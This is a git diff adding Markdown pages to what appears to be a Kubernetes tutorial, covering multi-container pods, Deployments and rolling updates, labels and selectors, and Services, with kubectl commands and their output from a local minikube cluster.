containers for an application is simpler to use, more transparent, and allows decoupling software dependencies + +##### Use Cases for Multi-Container Pods + +The primary purpose of a multi-container Pod is to support co-located, co-managed helper processes for a main program + +Sidecar containers: +"help" the main container. For example, log or data change watchers, monitoring adapters, and so on. +A log watcher, for example, can be built once by a different team and reused across different applications +Another example of a sidecar container is a file or data loader that generates data for the main container. + +#### Communication Between Containers in a Pod + +Shared volumes: +you can use a shared Kubernetes Volume as a simple and efficient way to share data between containers in a Pod. +Volumes enables data to survive container restarts. It has the same lifetime as a Pod. +it is sufficient to use a directory on the host that is shared with all containers within a Pod + +- A standard use case for a multi-container Pod with shared Volume is when one container writes to the shared directory (logs or other files), and the other container reads from the shared directory +- The second container uses Debian image and has the shared volume mounted to the directory /html. The second container every second adds current date and time and into index.html that is located in the shared volume. +- Nginx servers reads this file and transfers it to the user for each HTTP request to the web server. + +```sh +apiVersion: v1 +kind: Pod +metadata: + name: mc1 +spec: + volumes: + - name: html + emptyDir: {} + containers: + - name: 1st + image: nginx + volumeMounts: + - name: html + mountPath: /usr/share/nginx/html + - name: 2nd + image: debian + volumeMounts: + - name: html + mountPath: /html + command: ["/bin/sh", "-c"] + args: + - while true; do + date >> /html/index.html; + sleep 1; + done + +``` +#### kubectl apply + +```sh +➜ k8s101 git:(main) βœ— kubectl apply -f mc1.yaml +pod/mc1 created + +``` + +#### exec into mc1 pod 1st container + +```sh +➜ k8s101 git:(main) βœ— kubectl exec mc1 -c 1st -- /bin/cat /usr/share/nginx/html/index.html +Mon Mar 6 18:30:15 UTC 2023 +Mon Mar 6 18:30:16 UTC 2023 +Mon Mar 6 18:30:17 UTC 2023 +Mon Mar 6 18:30:18 UTC 2023 +Mon Mar 6 18:30:20 UTC 2023 +Mon Mar 6 18:30:21 UTC 2023 +Mon Mar 6 18:30:22 UTC 2023 +Mon Mar 6 18:30:23 UTC 2023 +Mon Mar 6 18:30:24 UTC 2023 +Mon Mar 6 18:30:25 UTC 2023 +Mon Mar 6 18:30:26 UTC 2023 +Mon Mar 6 18:30:27 UTC 2023 +Mon Mar 6 18:30:28 UTC 2023 +Mon Mar 6 18:30:29 UTC 2023 +Mon Mar 6 18:30:30 UTC 2023 +Mon Mar 6 18:30:31 UTC 2023 +Mon Mar 6 18:30:32 UTC 2023 +Mon Mar 6 18:30:33 UTC 2023 +Mon Mar 6 18:30:34 UTC 2023 +Mon Mar 6 18:30:35 UTC 2023 +Mon Mar 6 18:30:36 UTC 2023 +Mon Mar 6 18:30:37 UTC 2023 +Mon Mar 6 18:30:38 UTC 2023 +Mon Mar 6 18:30:39 UTC 2023 +Mon Mar 6 18:30:40 UTC 2023 +Mon Mar 6 18:30:41 UTC 2023 +Mon Mar 6 18:30:42 UTC 2023 +Mon Mar 6 18:30:43 UTC 2023 +Mon Mar 6 18:30:44 UTC 2023 +Mon Mar 6 18:30:45 UTC 2023 +Mon Mar 6 18:30:46 UTC 2023 +Mon Mar 6 18:30:47 UTC 2023 +Mon Mar 6 18:30:48 UTC 2023 +Mon Mar 6 18:30:49 UTC 2023 +Mon Mar 6 18:30:50 UTC 2023 +Mon Mar 6 18:30:51 UTC 2023 +Mon Mar 6 18:30:52 UTC 2023 +Mon Mar 6 18:30:53 UTC 2023 +Mon Mar 6 18:30:54 UTC 2023 +Mon Mar 6 18:30:55 UTC 2023 +Mon Mar 6 18:30:56 UTC 2023 +Mon Mar 6 18:30:57 UTC 2023 +Mon Mar 6 18:30:58 UTC 2023 +Mon Mar 6 18:30:59 UTC 2023 +Mon Mar 6 18:31:00 UTC 2023 +Mon Mar 6 18:31:01 UTC 2023 +Mon Mar 6 18:31:02 UTC 2023 +Mon Mar 6 18:31:03 UTC 2023 +Mon Mar 6 18:31:04 UTC 2023 +Mon Mar 6 18:31:05 UTC 2023 +Mon Mar 6 18:31:06 UTC 2023 +Mon Mar 6 18:31:07 UTC 2023 +Mon Mar 6 18:31:08 UTC 2023 +Mon Mar 6 18:31:09 UTC 2023 +Mon Mar 6 18:31:10 UTC 2023 +Mon Mar 6 18:31:11 UTC 2023 +Mon Mar 6 18:31:12 UTC 2023 +Mon Mar 6 18:31:13 UTC 2023 +Mon Mar 6 18:31:14 UTC 2023 +Mon Mar 6 18:31:15 UTC 2023 +Mon Mar 6 18:31:16 UTC 2023 +Mon Mar 6 18:31:17 UTC 2023 +Mon Mar 6 18:31:18 UTC 2023 +Mon Mar 6 18:31:19 UTC 2023 +Mon Mar 6 18:31:20 UTC 2023 +Mon Mar 6 18:31:21 UTC 2023 +Mon Mar 6 18:31:22 UTC 2023 +Mon Mar 6 18:31:23 UTC 2023 +Mon Mar 6 18:31:24 UTC 2023 +Mon Mar 6 18:31:25 UTC 2023 +Mon Mar 6 18:31:26 UTC 2023 +Mon Mar 6 18:31:27 UTC 2023 +Mon Mar 6 18:31:28 UTC 2023 +Mon Mar 6 18:31:29 UTC 2023 +Mon Mar 6 18:31:30 UTC 2023 +Mon Mar 6 18:31:31 UTC 2023 +Mon Mar 6 18:31:32 UTC 2023 +Mon Mar 6 18:31:33 UTC 2023 +Mon Mar 6 18:31:34 UTC 2023 +Mon Mar 6 18:31:35 UTC 2023 +Mon Mar 6 18:31:36 UTC 2023 +Mon Mar 6 18:31:37 UTC 2023 +Mon Mar 6 18:31:38 UTC 2023 +Mon Mar 6 18:31:39 UTC 2023 +Mon Mar 6 18:31:40 UTC 2023 +Mon Mar 6 18:31:41 UTC 2023 +Mon Mar 6 18:31:42 UTC 2023 +Mon Mar 6 18:31:43 UTC 2023 +Mon Mar 6 18:31:44 UTC 2023 +Mon Mar 6 18:31:45 UTC 2023 +``` + +#### exec into mc1 pod 3nd container + +```sh + k8s101 git:(main) βœ— kubectl exec mc1 -c 2nd -i -t -- bash -il +root@mc1:/# ls +bin boot dev etc home html lib media mnt opt proc root run sbin srv sys tmp usr var +root@mc1:/# cd html +root@mc1:/html# ls +index.html +root@mc1:/html# +``` + + +#### Kubernetes has three Object Types you should know about: + +- Pods - runs one or more closely related containers + +- Services - sets up networking in a Kubernetes cluster + +- Deployment - Maintains a set of identical pods, ensuring that they have the correct config and that the right number of them exist. + +Pods: + +- Runs a single set of containers +- Good for one-off dev purposes +- Rarely used directly in production + +Deployment: + +- Runs a set of identical pods +- Monitors the state of each pod, updating as necessary +- Good for dev +- Good for production + + +Pod templates : + +Controllers for workload resources create Pods from a pod template and manage those Pods on your behalf. + +-PodTemplates are specifications for creating Pods, and are included in workload resources such as Deployments, Jobs, and DaemonSets. + +``` +k8sworkshop git:(main) βœ— kubectl get all +NAME READY STATUS RESTARTS AGE +pod/command3 0/1 CrashLoopBackOff 65 (4m59s ago) 20h +pod/mc1 2/2 Running 0 77m + +NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE +service/kubernetes ClusterIP 10.96.0.1 443/TCP 115d + +``` + + + diff --git a/content/en/k8s/c5.Deployment-Replicaset 2.md b/content/en/k8s/c5.Deployment-Replicaset 2.md new file mode 100644 index 0000000..0e77361 --- /dev/null +++ b/content/en/k8s/c5.Deployment-Replicaset 2.md @@ -0,0 +1,416 @@ +--- +title: "Deployments and replication" +description: " Use Cases for Multi-Container Pods " +slug: "Deployments-and-replication" +--- + + +#### Kubectl explain Deployment + +```sh +k8sworkshop git:(main) βœ— kubectl explain deployments +KIND: Deployment +VERSION: apps/v1 + +DESCRIPTION: + Deployment enables declarative updates for Pods and ReplicaSets. + +FIELDS: + apiVersion + APIVersion defines the versioned schema of this representation of an + object. Servers should convert recognized schemas to the latest internal + value, and may reject unrecognized values. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources + + kind + Kind is a string value representing the REST resource this object + represents. Servers may infer this from the endpoint the client submits + requests to. Cannot be updated. In CamelCase. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds + + metadata + Standard object's metadata. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#metadata + + spec + Specification of the desired behavior of the Deployment. + + status + Most recently observed status of the Deployment. + +➜ k8sworkshop git:(main) βœ— + +``` + + + +#### Kubectl explain Replicaset + +```sh +➜ k8sworkshop git:(main) βœ— kubectl explain rs +KIND: ReplicaSet +VERSION: apps/v1 + +DESCRIPTION: + ReplicaSet ensures that a specified number of pod replicas are running at + any given time. + +FIELDS: + apiVersion + APIVersion defines the versioned schema of this representation of an + object. Servers should convert recognized schemas to the latest internal + value, and may reject unrecognized values. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources + + kind + Kind is a string value representing the REST resource this object + represents. Servers may infer this from the endpoint the client submits + requests to. Cannot be updated. In CamelCase. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds + + metadata + If the Labels of a ReplicaSet are empty, they are defaulted to be the same + as the Pod(s) that the ReplicaSet manages. Standard object's metadata. More + info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#metadata + + spec + Spec defines the specification of the desired behavior of the ReplicaSet. + More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#spec-and-status + + status + Status is the most recently observed status of the ReplicaSet. This data + may be out of date by some window of time. Populated by the system. + Read-only. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#spec-and-status + +➜ k8sworkshop git:(main) βœ— +``` + +#### Overview on Kubernetes Deployment + +Kubernetes also provides Deployment resource that sits on top of ReplicaSets and enables declarative application updates. + +- When running Pods in datacenter, additional features may be needed such as scalability, updates and rollback etc which are offered by Deployments
+ +- A Deployment is a higher-level resource meant for deploying applications and updating them declaratively, instead of doing it through a +ReplicationController or a ReplicaSet, which are both considered lower-level concepts. +
+- When you create a Deployment, a ReplicaSet resource is created underneath. Replica-Sets replicate and manage pods, as well.
+ +- When using a Deployment, the actual pods are created and managed by the Deployment’s ReplicaSets, not by the Deployment directly
+ +##### Create Kubernetes Deployment resource + +In the deployment spec, following properties are managed: + +- `replicas`: explains how many copies of each Pod should be running
+- `strategy`: explains how Pods should be updated
+- `selector`: uses matchLabels to identify how labels are matched against the Pod
+- `template`: contains the pod specification and is used in a deployment to create Pods
+- `scale` deployment: `kubectl scale deployment nginx-deployment --replicas 10`
+- `set image` : `kubectl set image deployment nginx-deployment nginx=nginx:1.91 --record`
+- `rollout undo`:` kubectl rollout undo deployment nginx-deployment`
+ +we will create a new deployment using kubectl using --dry-run so that actually a deployment is not created but just verified + +```sh +➜ k8sworkshop git:(main) βœ— kubectl create deployment nginx-deploy --image=nginx --dry-run=client -o yaml > nginx-deploy.yml + +-- Basic Template to cleanup + +[root@controller ~]# cat nginx-deploy.yml +apiVersion: apps/v1 +kind: Deployment +metadata: + creationTimestamp: null + labels: + app: nginx-deploy + name: nginx-deploy +spec: + replicas: 1 + selector: + matchLabels: + app: nginx-deploy + strategy: {} + template: + metadata: + creationTimestamp: null + labels: + app: nginx-deploy + spec: + containers: + - image: nginx + name: nginx + resources: {} + +--- #Modify the contents of the deployment template +# cat nginx-deploy.yml +apiVersion: apps/v1 +kind: Deployment +metadata: + labels: + type: dev + name: nginx-deploy +spec: + replicas: 2 + selector: + matchLabels: + type: dev + template: + metadata: + labels: + type: dev + spec: + containers: + - image: nginx + name: nginx +``` + +```sh +➜ k8sworkshop git:(main) βœ— kubectl create -f nginx-deploy.yml +deployment.apps/nginx-deploy created + +``` +```sh +➜ k8sworkshop git:(main) βœ— kubectl rollout status deployment nginx-deploy +deployment "nginx-deploy" successfully rolled out +``` + +```sh +➜ k8sworkshop git:(main) βœ— kubectl get pods +NAME READY STATUS RESTARTS AGE +nginx-deploy-66dc98fc6f-6ws8k 1/1 Running 0 37s +nginx-deploy-66dc98fc6f-btk6j 1/1 Running 0 37s +``` +```sh +kubectl describe Pod +➜ k8sworkshop git:(main) βœ— kubectl describe Pod nginx-deploy-66dc98fc6f-6ws8k +Name: nginx-deploy-66dc98fc6f-6ws8k +Namespace: default +Priority: 0 +Service Account: default +Node: minikube/192.168.49.2 +Start Time: Tue, 07 Mar 2023 02:12:20 +0530 +Labels: pod-template-hash=66dc98fc6f + type=dev +Annotations: +Status: Running +IP: 172.17.0.4 +IPs: + IP: 172.17.0.4 +Controlled By: ReplicaSet/nginx-deploy-66dc98fc6f +Containers: + nginx: + Container ID: docker://79a285bd1e02d96c1880958d20aa4cf64060c630ecb03dac37665994a8b4574a + Image: nginx + Image ID: docker-pullable://nginx@sha256:aa0afebbb3cfa473099a62c4b32e9b3fb73ed23f2a75a65ce1d4b4f55a5c2ef2 + Port: + Host Port: + State: Running + Started: Tue, 07 Mar 2023 02:12:25 +0530 + Ready: True + Restart Count: 0 + Environment: + Mounts: + /var/run/secrets/kubernetes.io/serviceaccount from kube-api-access-7wpgb (ro) +Conditions: + Type Status + Initialized True + Ready True + ContainersReady True + PodScheduled True +Volumes: + kube-api-access-7wpgb: + Type: Projected (a volume that contains injected data from multiple sources) + TokenExpirationSeconds: 3607 + ConfigMapName: kube-root-ca.crt + ConfigMapOptional: + DownwardAPI: true +QoS Class: BestEffort +Node-Selectors: +Tolerations: node.kubernetes.io/not-ready:NoExecute op=Exists for 300s + node.kubernetes.io/unreachable:NoExecute op=Exists for 300s +Events: + Type Reason Age From Message + ---- ------ ---- ---- ------- + Normal Scheduled 93s default-scheduler Successfully assigned default/nginx-deploy-66dc98fc6f-6ws8k to minikube + Normal Pulling 92s kubelet Pulling image "nginx" + Normal Pulled 88s kubelet Successfully pulled image "nginx" in 4.282948252s + Normal Created 88s kubelet Created container nginx + Normal Started 88s kubelet Started container nginx +➜ k8sworkshop git:(main) βœ— +``` +```sh +➜ k8sworkshop git:(main) βœ— kubectl get rs +NAME DESIRED CURRENT READY AGE +nginx-deploy-66dc98fc6f 2 2 2 3m30s +``` + +##### Using Kubernetes RollingUpdate + +You have two ways of updating all those pods. You can do one of the following: + +- Recreate: Delete all existing pods first and then start the new ones. This will lead to a temporary unavailability.
+- RollingUpdate: Updates Pod one at a time to guarantee availability of the application. This is the preferred approach and you can further tune its behaviour. + +The RollingUpdate strategy options are used to guarantee a certain minimal and maximal amount of Pods to be always available: + +- maxUnavailable: The maximum number of Pods that can be unavailable during updating. The value could be a percentage (the default is 25%). +- maxSurge: The maximum number of Pods that can be created over the desired number of ReplicaSet during updating. the value of maxSurge cannot be 0 + + +```sh +vim rolling-nginx.yml +---- +# cat rolling-nginx.yml +apiVersion: apps/v1 +kind: Deployment +metadata: + name: rolling-nginx +spec: + replicas: 4 + strategy: + type: RollingUpdate + rollingUpdate: + maxSurge: 1 + maxUnavailable: 1 + selector: + matchLabels: + app: rolling-nginx + template: + metadata: + labels: + app: rolling-nginx + spec: + containers: + - name: nginx + image: nginx:1.9 +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl create -f rolling-nginx.yml +deployment.apps/rolling-nginx created +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl get pods +NAME READY STATUS RESTARTS AGE +nginx-deploy-66dc98fc6f-6ws8k 1/1 Running 0 15m +nginx-deploy-66dc98fc6f-btk6j 1/1 Running 0 15m +rolling-nginx-77f89bcf9c-2cgps 0/1 ContainerCreating 0 13s +rolling-nginx-77f89bcf9c-l7cvh 0/1 ContainerCreating 0 13s +rolling-nginx-77f89bcf9c-nx888 0/1 ContainerCreating 0 13s +rolling-nginx-77f89bcf9c-xn2z5 0/1 ContainerCreating 0 13s +``` +```sh +➜ k8s101 git:(main) βœ— kubectl get deployments +NAME READY UP-TO-DATE AVAILABLE AGE +nginx-deploy 2/2 2 2 15m +rolling-nginx 1/4 4 1 50s +``` +```sh +➜ k8s101 git:(main) βœ— kubectl get event --field-selector involvedObject.name=rolling-nginx-77f89bcf9c-xn2z5 +LAST SEEN TYPE REASON OBJECT MESSAGE +99s Normal Scheduled pod/rolling-nginx-77f89bcf9c-xn2z5 Successfully assigned default/rolling-nginx-77f89bcf9c-xn2z5 to minikube +99s Normal Pulling pod/rolling-nginx-77f89bcf9c-xn2z5 Pulling image "nginx:1.9" +43s Normal Pulled pod/rolling-nginx-77f89bcf9c-xn2z5 Successfully pulled image "nginx:1.9" in 56.078369942s +43s Normal Created pod/rolling-nginx-77f89bcf9c-xn2z5 Created container nginx +43s Normal Started pod/rolling-nginx-77f89bcf9c-xn2z5 Started container nginx +``` +#### Check rollout history + +But why CHANGE-CAUSE is showing NONE? It is because we have not used --record while creating our deployment. +The --record argument will add the command under CHANGE-CAUSE for each revision history +```sh + k8s101 git:(main) βœ— kubectl rollout history deployment rolling-nginx +deployment.apps/rolling-nginx +REVISION CHANGE-CAUSE +1 + +➜ k8s101 git:(main) βœ— kubectl delete deployment rolling-nginx +deployment.apps "rolling-nginx" deleted +``` + +#### this time I will use --record along with kubectl create: + +```sh +k8s101 git:(main) βœ— kubectl create -f rolling-nginx.yml --record +Flag --record has been deprecated, --record will be removed in the future +deployment.apps/rolling-nginx created +``` +```sh +➜ k8s101 git:(main) βœ— kubectl rollout history deployment rolling-nginx +deployment.apps/rolling-nginx +REVISION CHANGE-CAUSE +1 kubectl create --filename=rolling-nginx.yml --record=true +``` +```sh +➜ k8s101 git:(main) βœ— kubectl set image deployment rolling-nginx nginx=nginx:1.15 --record +Flag --record has been deprecated, --record will be removed in the future +deployment.apps/rolling-nginx image updated +``` +#### Monitor the rolling update status + +To monitor the rollout status you can use: + +```sh +➜ k8s101 git:(main) βœ— kubectl set image deployment rolling-nginx nginx=nginx:1.16 --record +Flag --record has been deprecated, --record will be removed in the future +deployment.apps/rolling-nginx image updated +``` +```sh +➜ k8s101 git:(main) βœ— kubectl rollout pause deployment rolling-nginx +deployment.apps/rolling-nginx paused +``` +```sh +➜ k8s101 git:(main) βœ— kubectl rollout status deployment rolling-nginx +deployment "rolling-nginx" successfully rolled out +``` +```sh +➜ k8s101 git:(main) βœ— kubectl get pods -l app=rolling-nginx +NAME READY STATUS RESTARTS AGE +rolling-nginx-55fc56899f-8hlm4 1/1 Running 0 2m30s +rolling-nginx-55fc56899f-g4b6p 1/1 Running 0 2m30s +rolling-nginx-55fc56899f-hnbs8 1/1 Running 0 2m22s +rolling-nginx-55fc56899f-jngcd 1/1 Running 0 2m21s +``` +```sh +➜ k8s101 git:(main) βœ— kubectl rollout resume deployment rolling-nginx +deployment.apps/rolling-nginx resumed +``` + +#### Rolling back (undo) an update +To monitor the rollout status you can use: + +```sh +➜ k8s101 git:(main) βœ— kubectl rollout history deployment rolling-nginx +deployment.apps/rolling-nginx +REVISION CHANGE-CAUSE +1 kubectl create --filename=rolling-nginx.yml --record=true +2 kubectl set image deployment rolling-nginx nginx=nginx:1.15 --record=true +3 kubectl set image deployment rolling-nginx nginx=nginx:1.16 --record=true +``` +```sh +➜ k8s101 git:(main) βœ— kubectl rollout undo deployment rolling-nginx --to-revision=2 +deployment.apps/rolling-nginx rolled back +``` +```sh +➜ k8s101 git:(main) βœ— kubectl rollout status deployment rolling-nginx +deployment "rolling-nginx" successfully rolled out + +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl delete pod --all +pod "nginx-deploy-66dc98fc6f-6ws8k" deleted +pod "nginx-deploy-66dc98fc6f-btk6j" deleted +pod "rolling-nginx-b746d459b-874mv" deleted +pod "rolling-nginx-b746d459b-gtgpk" deleted +pod "rolling-nginx-b746d459b-txc5j" deleted +pod "rolling-nginx-b746d459b-vw4rf" deleted +➜ k8s101 git:(main) βœ— kubectl delete deployment --all +deployment.apps "nginx-deploy" deleted +deployment.apps "rolling-nginx" deleted +``` diff --git a/content/en/k8s/c6.labels-selectors 2.md b/content/en/k8s/c6.labels-selectors 2.md new file mode 100644 index 0000000..328cf23 --- /dev/null +++ b/content/en/k8s/c6.labels-selectors 2.md @@ -0,0 +1,257 @@ +--- +title: "Labels and Selectors " +description: " Selectors Labels " +slug: "Labels-and-Selectors" +--- + +#### Labels - Maps (aka Dictionaries) + +```sh +➜ k8s101 git:(main) βœ— kubectl explain deployment.metadata.labels +KIND: Deployment +VERSION: apps/v1 + +FIELD: labels + +DESCRIPTION: + Map of string keys and values that can be used to organize and categorize + (scope and select) objects. May match selectors of replication controllers + and services. More info: http://kubernetes.io/docs/user-guide/labels +``` + +- Labels are attached to Kubernetes objects and are simple key: value pairs or maps(dictionary).
+- Labels are used to store identifying information about a thing that you might need to query against.
+- Labels are used for organization and selection of subsets of objects, and can be added to objects at creation time and/or modified at any time during cluster operations.
+- You will see them on pods, replication controllers, replica sets, services, and so on.
+ +```sh +β€œlabels”: { +β€œtier”: β€œfrontend” +env: prod +} + +``` + +#### Selectors - Maps (aka Dictionaries) + +- Labels are queryable β€” which makes them especially useful in organizing things
+- A label selector is a string that identifies which labels you are trying to match
+- You will see them on pods, replication controllers, replica sets, services, and so on.
+ +``````sh +tier = frontend +tier != frontend +environment in (production, qa) +`````` + +#### Annotations +- Annotations are bits of useful information you might want to store about a pod (or cluster, node, etc.) that you will not have to query against. +- They are also key/value pairs and have the same rules as labels. +- Examples of things you might put there are the pager contact, the build date, or a pointer to more information someplace elseβ€”like a URL. + +#### Method-1: Assign labels while creating a new object + +```sh +kubectl create deployment label-nginx-example --image=nginx --dry-run=client -oyaml > label-nginx-example.yml +# clean up the template and add a label app: prod +``` + +```sh +➜ k8s101 git:(main) βœ— cat label-nginx-example.yml +apiVersion: apps/v1 +kind: Deployment +metadata: + labels: + app: prod + name: label-nginx-example +spec: + replicas: 2 + selector: + matchLabels: + app: prod + template: + metadata: + labels: + app: prod + spec: + containers: + - image: nginx + name: nginx +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl create -f label-nginx-example.yml +deployment.apps/label-nginx-example created +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl get deployments --show-labels + +NAME READY UP-TO-DATE AVAILABLE AGE LABELS +label-nginx-example 1/1 1 1 23s app=label-nginx-example +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl get pods --show-labels +NAME READY STATUS RESTARTS AGE LABELS +label-nginx-example-848d6df75-x8bb6 1/1 Running 0 45s app=label-nginx-example,pod-template-hash=848d6df75 +➜ k8s101 git:(main) βœ— + +``` + + +#### Assign a new label to existing pod runtime as a patch + +will assign new label "tier: frontend" to our existing Pods from the deployment label-nginx-example + +```sh +[root@controller ~]# cat update-label.yml +spec: + template: + metadata: + labels: + tier: frontend +``` + +### Next patch the deployment with this YAML file + +```sh +➜ k8s101 git:(main) βœ— kubectl patch deployment label-nginx-example --patch "$(cat update-label.yml)" +deployment.apps/label-nginx-example patched +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl describe deployment label-nginx-example +Name: label-nginx-example +Namespace: default +CreationTimestamp: Tue, 07 Mar 2023 05:40:07 +0530 +Labels: app=label-nginx-example +Annotations: deployment.kubernetes.io/revision: 2 +Selector: app=label-nginx-example +Replicas: 1 desired | 1 updated | 1 total | 1 available | 0 unavailable +StrategyType: RollingUpdate +MinReadySeconds: 0 +RollingUpdateStrategy: 25% max unavailable, 25% max surge +Pod Template: + Labels: app=label-nginx-example + tier=frontend + Containers: + nginx: + Image: nginx + Port: + Host Port: + Environment: + Mounts: + Volumes: +Conditions: + Type Status Reason + ---- ------ ------ + Available True MinimumReplicasAvailable + Progressing True NewReplicaSetAvailable +OldReplicaSets: +NewReplicaSet: label-nginx-example-5f8bc677b9 (1/1 replicas created) +Events: + Type Reason Age From Message + ---- ------ ---- ---- ------- + Normal ScalingReplicaSet 4m35s deployment-controller Scaled up replica set label-nginx-example-848d6df75 to 1 + Normal ScalingReplicaSet 74s deployment-controller Scaled up replica set label-nginx-example-5f8bc677b9 to 1 + Normal ScalingReplicaSet 70s deployment-controller Scaled down replica set label-nginx-example-848d6df75 to 0 from 1 +➜ k8s101 git:(main) βœ— +``` +```sh +➜ k8s101 git:(main) βœ— kubectl get pods --show-labels +NAME READY STATUS RESTARTS AGE LABELS +label-nginx-example-5f8bc677b9-92lp9 1/1 Running 0 7m31s app=label-nginx-example,pod-template-hash=5f8bc677b9,tier=frontend +``` + + +#### Method-3: Assign a new label to existing deployments runtime using kubectl + +I have another deployment nginx-deploy on my cluster, so I will assign label tier: backend to this deployment: + +```sh +kubectl label deployment nginx-deploy tier=backend + +kubectl get deployments --show-labels + +``` +#### Using labels to list resource objects + +```sh +kubectl get pods --show-labels + +kubectl get deployments --show-labels + +kubectl get all --show-labels + +--- #To list all the deployments using type: dev label: +kubectl get deployments -l type=dev + +kubectl get pods -l app=prod +``` + +#### Using Selector to list resource objects + +I will create another deployment here with two labels and use one of the label as selector: + +```sh +# cat lab-nginx.yml +apiVersion: apps/v1 +kind: Deployment +metadata: + labels: + app: dev + tier: backend + name: lab-nginx +spec: + replicas: 2 + selector: + matchLabels: + app: dev + template: + metadata: + labels: + app: dev + spec: + containers: + - image: nginx + name: nginx +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl create -f lab-nginx.yml +deployment.apps/lab-nginx created +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl get pods --show-labels +NAME READY STATUS RESTARTS AGE LABELS +lab-nginx-84756b7fc4-8h2jr 1/1 Running 0 31s app=dev,pod-template-hash=84756b7fc4 +lab-nginx-84756b7fc4-pgxbr 1/1 Running 0 31s app=dev,pod-template-hash=84756b7fc4 +label-nginx-example-5f8bc677b9-92lp9 1/1 Running 0 14m app=label-nginx-example,pod-template-hash=5f8bc677b9,tier=frontend +``` + +```sh +➜ k8s101 git:(main) βœ— +kubectl get pods --selector "app=dev" +NAME READY STATUS RESTARTS AGE +lab-nginx-84756b7fc4-8h2jr 1/1 Running 0 5m44s +lab-nginx-84756b7fc4-pgxbr 1/1 Running 0 5m44s +➜ k8s101 git:(main) βœ— +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl get pods -l app=dev +NAME READY STATUS RESTARTS AGE +lab-nginx-84756b7fc4-8h2jr 1/1 Running 0 6m47s +lab-nginx-84756b7fc4-pgxbr 1/1 Running 0 6m47s +``` + +##### Removing labels + +``` +kubectl get pods --show-labels + +kubectl get deployments --show-labels + +``` diff --git a/content/en/k8s/c7.Services 2.md b/content/en/k8s/c7.Services 2.md new file mode 100644 index 0000000..273927a --- /dev/null +++ b/content/en/k8s/c7.Services 2.md @@ -0,0 +1,287 @@ +--- +title: "Kubernetes Service " +description: " Use Cases for Multi-Container Pods " +slug: "Kubernetes-Service" +--- + +#### kubectl explain svc + +```sh +➜ k8s101 git:(main) βœ— kubectl explain svc +KIND: Service +VERSION: v1 + +DESCRIPTION: + Service is a named abstraction of software service (for example, mysql) + consisting of local port (for example 3306) that the proxy listens on, and + the selector that determines which pods will answer requests sent through + the proxy. + +FIELDS: + apiVersion + APIVersion defines the versioned schema of this representation of an + object. Servers should convert recognized schemas to the latest internal + value, and may reject unrecognized values. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources + + kind + Kind is a string value representing the REST resource this object + represents. Servers may infer this from the endpoint the client submits + requests to. Cannot be updated. In CamelCase. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds + + metadata + Standard object's metadata. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#metadata + + spec + Spec defines the behavior of a service. + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#spec-and-status + + status + Most recently observed status of the service. Populated by the system. + Read-only. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#spec-and-status + + +``` + +#### Create Kubernetes Service + +A Kubernetes Service is an object you create to provide a single, stable access point to a set of pods that provide the same service.
+ +A service can be backed by more than one pod. When you connect to a service, the connection is passed to one of the backing pods.
+ +Add labels to Pod objects and specify the label selector in the Service object. The pods whose labels match the selector are part of the service registered service endpoints.
+ +- The shorthand for services is svc
+ +#### Understanding different Kubernetes Service Types + +- ClusterIP: It is the default type, but it provides internal access only.
+ +- NodePort: which allocates a specific node port which needs to be opened on the firewall. That means that by using these node ports, external users, as long as they can reach out to the nodes' IP addresses, are capable of reaching out to the Service. +
+- LoadBalancer: currently only implemented in public cloud. So if you're on Kubernetes in Azure or AWS, you will find a load balancer.
+ +- ExternalName: which is a relatively new object that works on DNS names and redirection is happening at the DNS level. +Service without selector: which is used for direct connections based on IP port combinations without an endpoint. And this is useful for connections to a database or between namespaces. +
+ +#### Using kubectl expose + +The easiest way to create a service is through kubectl expose + +```sh +kubectl create deployment nginx-lab-1 --image=nginx --replicas=3 --dry-run=client -o yaml > nginx-lab-1.yml + +---- # modify few sections and following is my final template file to create a new deployment nginx-lab-1 with a label app=dev and 3 replicas. +apiVersion: apps/v1 +kind: Deployment +metadata: + labels: + app: dev + name: nginx-lab-1 +spec: + replicas: 3 + selector: + matchLabels: + app: dev + template: + metadata: + labels: + app: dev + spec: + containers: + - image: nginx + name: nginx + +--- +# cat quote for pod +apiVersion: v1 +kind: Service +metadata: + name: quote +spec: + type: ClusterIP + selector: + app: quote + ports: + - name: http + port: 80 + targetPort: 80 + protocol: TCP + +``` + +``` +➜ k8s101 git:(main) βœ— kubectl create -f nginx-lab-1.yml +deployment.apps/nginx-lab-1 created +service/quote created + +``` + +#### To create the service, you’ll tell Kubernetes to expose the Deployment you created earlier, here port 80 is the default port on which our nginx application would be listening on. + +```sh +➜ k8s101 git:(main) βœ— kubectl expose deployment nginx-lab-1 --type=NodePort --port=80 +service/nginx-lab-1 exposed +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl describe svc nginx-lab-1 +Name: nginx-lab-1 +Namespace: default +Labels: app=dev +Annotations: +Selector: app=dev +Type: NodePort +IP Family Policy: SingleStack +IP Families: IPv4 +IP: 10.98.242.63 +IPs: 10.98.242.63 +Port: 80/TCP +TargetPort: 80/TCP +NodePort: 31613/TCP +Endpoints: 172.17.0.13:80,172.17.0.14:80,172.17.0.15:80 + 2 more... +Session Affinity: None +External Traffic Policy: Cluster +Events: 